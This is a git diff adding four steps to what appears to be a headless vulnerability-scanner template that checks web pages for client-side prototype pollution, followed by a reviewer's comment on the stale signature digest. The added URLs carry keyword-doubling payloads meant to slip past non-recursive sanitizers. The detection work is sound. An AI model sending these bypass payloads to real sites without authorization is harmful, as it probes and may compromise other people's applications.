diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml
index 5489a5ce48..f5c7199944 100644
--- a/headless/prototype-pollution-check.yaml
+++ b/headless/prototype-pollution-check.yaml
@@ -88,4 +88,85 @@ headless:
 part: extract4
 words:
 - "polluted"
-# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ - steps:
+ - args:
+ url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
+ action: navigate
+
+ - action: waitload
+
+ - action: script
+ name: extract5
+ args:
+ code: |
+ () => {
+ return window.vulnerableprop
+ }
+ matchers:
+ - type: word
+ part: extract5
+ words:
+ - "polluted"
+
+ - steps:
+ - args:
+ url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
+ action: navigate
+
+ - action: waitload
+
+ - action: script
+ name: extract6
+ args:
+ code: |
+ () => {
+ return window.vulnerableprop
+ }
+ matchers:
+ - type: word
+ part: extract6
+ words:
+ - "polluted"
+
+ - steps:
+ - args:
+ url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
+ action: navigate
+
+ - action: waitload
+
+ - action: script
+ name: extract7
+ args:
+ code: |
+ () => {
+ return window.vulnerableprop
+ }
+ matchers:
+ - type: word
+ part: extract7
+ words:
+ - "polluted"
+
+ - steps:
+ - args:
+ url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
+ action: navigate
+
+ - action: waitload
+
+ - action: script
+ name: extract8
+ args:
+ code: |
+ () => {
+ return window.vulnerableprop
+ }
+ matchers:
+ - type: word
+ part: extract8
+ words:
+ - "polluted"
+
+# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
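Review bot: The trailing `# digest:` line is re-added with exactly the value that was removed, even though four new `steps` blocks (extract5 to extract8) now sit above it, so the signature presumably no longer matches the template body. Unless the project re-signs templates in CI after merge, consumers that verify the digest would treat this file as modified or unsigned; regenerate the digest as part of this change, or say in the description that signing happens afterwards. Separately, the new URLs carry no explanation: a comment above the first new block, such as `# variants for sanitizers that strip "__proto__", "constructor" or "prototype" in a single non-recursive pass`, would tell a maintainer why these differ from the earlier steps; that reading is inferred from the payload strings, so confirm it with the author. The `headless:` list starts outside the hunk, so the earlier steps and their matcher settings cannot be compared from here.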